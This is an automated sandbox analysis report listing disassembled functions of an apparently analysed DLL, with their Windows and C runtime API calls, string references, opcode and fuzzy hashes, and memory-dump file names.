Download Yara Rule

APIs

Part of subcall function 6F18E440: GetModuleHandleW.KERNEL32(Advapi32.dll,1E3BCBB0), ref: 6F18E494
Part of subcall function 6F18E440: RegCloseKey.ADVAPI32(00000000), ref: 6F18E4F3

RegCloseKey.ADVAPI32(?,?,?), ref: 6F18E592
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6F18E5DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6F18E613
RegCloseKey.ADVAPI32(?), ref: 6F18E628
RegCloseKey.ADVAPI32(?), ref: 6F18E650
RegCloseKey.ADVAPI32(?), ref: 6F18E678

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: a66901a894c05541df6e30dfcdecb056771e1cc60f8f7cb8c84f6d42da7d2a6b
Instruction ID: f90404b00212a4b3c67a7de64dba997aafdd6c75b55dbf1c7a189d2503185850
Opcode Fuzzy Hash: a66901a894c05541df6e30dfcdecb056771e1cc60f8f7cb8c84f6d42da7d2a6b
Instruction Fuzzy Hash: CC416F712043059BD710DF55D894BABB7E8FF99394F00492EF969D7280DB31E9148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F19B2A1, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6F1992CF,6F194EA0,6F195531,?,6F19574E,?,00000001,?,?,00000001,?,6F1CCC28,0000000C,6F195842), ref: 6F19B2AF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F19B2BD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F19B2D6
SetLastError.KERNEL32(00000000,6F19574E,?,00000001,?,?,00000001,?,6F1CCC28,0000000C,6F195842,?,00000001,?), ref: 6F19B328

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e4fccfb3204ca8f6781a1d531ae3c1c89e1f2ba7f41b7fa1ab9030ce58990d98
Instruction ID: 202321dda150ef6e877e000e4c37aefe74c92b0848518849b3ddd2d5df0711e6
Opcode Fuzzy Hash: e4fccfb3204ca8f6781a1d531ae3c1c89e1f2ba7f41b7fa1ab9030ce58990d98
Instruction Fuzzy Hash: C601F73220CB129EE70495759C84A6A2A69FF076F9B21032FF574555D0FF177B3042E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F196698, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6F19669F
std::_Lockit::_Lockit.LIBCPMT ref: 6F1966A9

Part of subcall function 6F1819B0: std::_Lockit::_Lockit.LIBCPMT ref: 6F1819CD
Part of subcall function 6F1819B0: std::_Lockit::~_Lockit.LIBCPMT ref: 6F1819E9

codecvt.LIBCPMT ref: 6F1966E3
std::_Facet_Register.LIBCPMT ref: 6F1966FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6F19671A
__CxxThrowException@8.LIBVCRUNTIME ref: 6F196738

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 75d5209751363691e73013b2b24d832e07f295d047b3f5d3122be5b56e5de4d5
Instruction ID: 6b2f3d65158e5f5861004b7f9fd1083fc73d1a8fdf2ccc094f6551f2570d91b2
Opcode Fuzzy Hash: 75d5209751363691e73013b2b24d832e07f295d047b3f5d3122be5b56e5de4d5
Instruction Fuzzy Hash: F6119E76900219DBCF04DBA4C954AAD77B5BF553E8F150109E4217B2D0DF34BA25CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6F191390, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6F18BC70: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,1E3BCBB0,00000000,?), ref: 6F18BCDE

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6F1913E7
PdhRemoveCounter.PDH(?,?,00000000), ref: 6F191483
PdhCloseQuery.PDH(?,?,00000000), ref: 6F191498

Strings

edit, xrefs: 6F1913E0
0, xrefs: 6F191547

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: d6fac06724866878c6b0943652e2216f6efab536a88fb1adfd6e3e8f92b33712
Instruction ID: ac77268fc42363be80bc5f3ab1696ad474da2d9d8c3343df85a6857ccff537db
Opcode Fuzzy Hash: d6fac06724866878c6b0943652e2216f6efab536a88fb1adfd6e3e8f92b33712
Instruction Fuzzy Hash: 1EA117716003058FD704CF28C890B9AB7B5FF95394F10861DE965AB2A0D771F9A4CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AD00E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1AD196

Strings

*?, xrefs: 6F1AD04F
., xrefs: 6F1AD39F

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction ID: a6aa2da860d7d5728bd5c2764c5cd017521a288f23d17d0d70601d4df2032619
Opcode Fuzzy Hash: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction Fuzzy Hash: 5A616DB9D0060ADFDB05CFA8C9808EDFBF6EF58390B24416AD845E7340D732AE518B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F182120, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6F18221D

Part of subcall function 6F1994A7: RaiseException.KERNEL32(?,?,6F196476,000000FF,00000000,00000000,24448D6F,?,?,?,?,6F196476,000000FF,6F1CCD2C,?,000000FF), ref: 6F199507

__CxxThrowException@8.LIBVCRUNTIME ref: 6F182262
___std_exception_copy.LIBVCRUNTIME ref: 6F18228F

Strings

ios_base::badbit set, xrefs: 6F182227, 6F182252, 6F182273
ios_base::failbit set, xrefs: 6F182135

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-1240500531
Opcode ID: cda90dd3d69d349c71032d2f914376ed32261f2637cb38be1737d3d800f3f7af
Instruction ID: 4ad5fc3e78e908519f089dea737ba31203ac5dbd4e5c6ca0eff26027f46cf70e
Opcode Fuzzy Hash: cda90dd3d69d349c71032d2f914376ed32261f2637cb38be1737d3d800f3f7af
Instruction Fuzzy Hash: DF41E475900208AFC705CF68C940BDEBBB9EF593A4F14861EE524E7680E775B924CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F185D90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91threadclipboardCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185E04
SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F185E74
GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6F185E93
GetACP.KERNEL32(00000000,?,?,?), ref: 6F185EA4

Strings

e, xrefs: 6F185DAF

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardOpenSwitchThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: e
API String ID: 1567280528-4024072794
Opcode ID: 9fec0d24e185378fc94bc5712d710c0702b1cd62b34046420fc08c2fe6930611
Instruction ID: 54450241ec606034c10bf1d484c7067bd554a85ae965554f0f5848e16a591fbd
Opcode Fuzzy Hash: 9fec0d24e185378fc94bc5712d710c0702b1cd62b34046420fc08c2fe6930611
Instruction Fuzzy Hash: DA31C8319187458FC302CF3A954451AF7E6AFDA3D4F148B2EF451F3151FB30A8A99A92

Uniqueness

Uniqueness Score: -1.00%

Function 6F191C00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6F191C2A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6F191C3E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6F191C52

Strings

Performance Monitor - (Reload Configuration), xrefs: 6F191C2C
Performance Monitor - (Edit Configuration), xrefs: 6F191C40

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: b5c42abcd4f5c3fcda15f3541e5026e93b4f6c27356c625c068dd0338719e18e
Instruction ID: d8be514d911f71ac9a54c2ee09848658fb43b82a5534cd0aebdca0197a9f4784
Opcode Fuzzy Hash: b5c42abcd4f5c3fcda15f3541e5026e93b4f6c27356c625c068dd0338719e18e
Instruction Fuzzy Hash: 42F0BE3314021DBBEB01DE849C80FBB7B6DEB49760F144016FB14A6181C375A921ABB4

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A6A30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6F1A69E1,6F1A69A9), ref: 6F1A6A50
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F1A6A63
FreeLibrary.KERNEL32(00000000,?,?,?,6F1A69E1,6F1A69A9), ref: 6F1A6A86

Strings

CorExitProcess, xrefs: 6F1A6A5B
mscoree.dll, xrefs: 6F1A6A49

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dc0f7c5f66435e241b647855dff9c1422829f6b2b777ca41284bf4e2b16a531b
Instruction ID: 67c51a0530f3d235d0393d61ff7d9912a223ddecc83831f1b99e0e2d5df98df7
Opcode Fuzzy Hash: dc0f7c5f66435e241b647855dff9c1422829f6b2b777ca41284bf4e2b16a531b
Instruction Fuzzy Hash: 5CF0A434500608FBCF01DFA5C848BEEBFB4EF056A1F014169E815A6150DB365960CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AED2F, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff52c5ba39d68e29abb8c62291fd8c30282745cbd49fc09e674e9ff759a8458
Instruction ID: e4124985a83492196b9471d3182e162a5d26065e5fbd5f237d0b4a1a0f030e1c
Opcode Fuzzy Hash: 9ff52c5ba39d68e29abb8c62291fd8c30282745cbd49fc09e674e9ff759a8458
Instruction Fuzzy Hash: 9A71A739901216DFDB15CF7AC8846EFBB75FF613E0F14422AE4249B180D772AA61C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AB9B3, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

_free.LIBCMT ref: 6F1ABABE
_free.LIBCMT ref: 6F1ABAD5
_free.LIBCMT ref: 6F1ABAF4
_free.LIBCMT ref: 6F1ABB0F
_free.LIBCMT ref: 6F1ABB26

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: fee8c617ab5432e5cbdc91e0f5101ab98651fed49f02e6dffb0a595ed2864a23
Instruction ID: 1a1cc283a5bc1efda38ddbd1fcbc53d8e4f7e702ed22657d498af2243049594c
Opcode Fuzzy Hash: fee8c617ab5432e5cbdc91e0f5101ab98651fed49f02e6dffb0a595ed2864a23
Instruction Fuzzy Hash: 5751C475A00708AFE714DF69CC40AAA77F4FF557A4F404669E809DB290E733E921CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6F194260, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,1E3BCBB0,?,?,00000000,6F1B9E9B,000000FF,?,6F1915EF,00000000), ref: 6F1942B3
PdhCloseQuery.PDH(?,1E3BCBB0,?,?,00000000,6F1B9E9B,000000FF,?,6F1915EF,00000000), ref: 6F1942DE
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6F194302
PdhValidatePathW.PDH(?), ref: 6F19435E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6F19438A

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: 420da8b4a023acf31e852126cdaf124e61d79db36ff2bea84f4e4bfc6c36a4b1
Instruction ID: d4a38a1bed72f4ed9b8df7f5b60e5aa12f449292f7562361c7661ff43c0180c2
Opcode Fuzzy Hash: 420da8b4a023acf31e852126cdaf124e61d79db36ff2bea84f4e4bfc6c36a4b1
Instruction Fuzzy Hash: ED518F71900258EBDB20CF24C844BDAB7B4FF55394F00819AE568AB294D775BAE5CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A70FB, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1A716D
_free.LIBCMT ref: 6F1A718D

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7b3ca1048bf217e9492332a24373eea7f3fd8b254e33ad6e73ff244683e4552f
Instruction ID: 9faf7b2816b9bfc35853ecd53a64838ed97bee3067a94e0297386fc2a2d3cd66
Opcode Fuzzy Hash: 7b3ca1048bf217e9492332a24373eea7f3fd8b254e33ad6e73ff244683e4552f
Instruction Fuzzy Hash: 4E41D13AA003049FCB15DF78C880A5AB7F6EF89754B1545AAD515EB385DB32AA11CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6F184C40, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F184C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6F184C9E
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184CBE
std::_Facet_Register.LIBCPMT ref: 6F184D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184DAF

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 8905499d73aa7555f5a629ad9bf04742e80c53df245682e63c299cda079a6870
Instruction ID: c91b2ea83f5c70ea63bd09388a688739e288d1346878e849dbf52f69d300cbc0
Opcode Fuzzy Hash: 8905499d73aa7555f5a629ad9bf04742e80c53df245682e63c299cda079a6870
Instruction Fuzzy Hash: 5151A871A04215CBDB11CF98C640B9EB7F8FF557A4F10425AD826BB280DB74BA65CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F184AE0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F184B16
std::_Lockit::_Lockit.LIBCPMT ref: 6F184B36
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184B56
std::_Facet_Register.LIBCPMT ref: 6F184BF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184C13

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: fee0f13cf6ac21260313ed190937659738d845e801b605d00dc9823bf30c96f2
Instruction ID: 9dd5b52ea80cd4109be03e5302c88bc5dbd9ae598274c74ca9fe03828df8f0b6
Opcode Fuzzy Hash: fee0f13cf6ac21260313ed190937659738d845e801b605d00dc9823bf30c96f2
Instruction Fuzzy Hash: 5641B9719042148FDB15CF98C680B9EB7B8FF517A4F10416AD826AB281DB34BA21CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ADD03, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F1ADD0C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F1ADD2F

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6F1ADD55
_free.LIBCMT ref: 6F1ADD68
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F1ADD77

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 95e39b8ba7cbda7f64f48687923e94e03218ae8a808e75164ecfab5f203686b9
Instruction ID: 4fa11dd49af09ec4c711583bee4bfd53795ef22ee2a115e3185ddec9d6d54212
Opcode Fuzzy Hash: 95e39b8ba7cbda7f64f48687923e94e03218ae8a808e75164ecfab5f203686b9
Instruction Fuzzy Hash: E5017576601F59BF271155765C8CDBB397EEEC3EE43110169BD24C7184DA639C2181B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B4978, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1B4990

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1B49A2
_free.LIBCMT ref: 6F1B49B4
_free.LIBCMT ref: 6F1B49C6
_free.LIBCMT ref: 6F1B49D8

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 05f9638aad2ce348fa2f5e027d679e52190fb5db85cb95292bb1555f36ab9f75
Instruction ID: 32d1404446e3b5b163f0e7e6558655925c91b631fc2ab2a7d709632c8d3cac39
Opcode Fuzzy Hash: 05f9638aad2ce348fa2f5e027d679e52190fb5db85cb95292bb1555f36ab9f75
Instruction Fuzzy Hash: CEF04F31400B0DDB8A10DE58D490C8737DEBA146E03D1880AE069DB544C736F8B086A4

Uniqueness

Uniqueness Score: -1.00%

Function 6F198750, Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6F19875C
GetLastError.KERNEL32(?,00000000,?,00000000,8007000E), ref: 6F198761
_com_issue_error.COMSUPP ref: 6F198774
GetLastError.KERNEL32(?,00000000,8007000E), ref: 6F198782
_com_issue_error.COMSUPP ref: 6F198795

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast
String ID:
API String ID: 1321852664-0
Opcode ID: 1f4d54cc57258769750ab093232aeb7c9f6a266981b3855731126f778aa98c31
Instruction ID: d3d35c8f1bd84c8c9d33daf7a74031f9f37d78c700066f522acd5a92c485faf1
Opcode Fuzzy Hash: 1f4d54cc57258769750ab093232aeb7c9f6a266981b3855731126f778aa98c31
Instruction Fuzzy Hash: 24E01D74544759DFC6006B710C0876A35A47F111F9FA046587074F91D4DB2DF13145FA

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A6AD4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F1A6B17, 6F1A6B1E, 6F1A6B52

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: a71713beb0110dca589e03759998f1af1fbbe8b3bade38e4b1b52720de9df056
Instruction ID: 9fc1c2c65318383fc164284dc4c96f8d48d0fe4ccbdf5e75f55bea13cb771d9c
Opcode Fuzzy Hash: a71713beb0110dca589e03759998f1af1fbbe8b3bade38e4b1b52720de9df056
Instruction Fuzzy Hash: 2D418279A0061CAFDB11DF9D898099FBBBCEF977A0B11416AE804E7240D773AA60C750

Uniqueness

Uniqueness Score: -1.00%

Function 6F1817B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F1817DD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F18182C

Part of subcall function 6F1960DA: _Yarn.LIBCPMT ref: 6F1960F9
Part of subcall function 6F1960DA: _Yarn.LIBCPMT ref: 6F19611D

__CxxThrowException@8.LIBVCRUNTIME ref: 6F18185E

Strings

bad locale name, xrefs: 6F181848

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
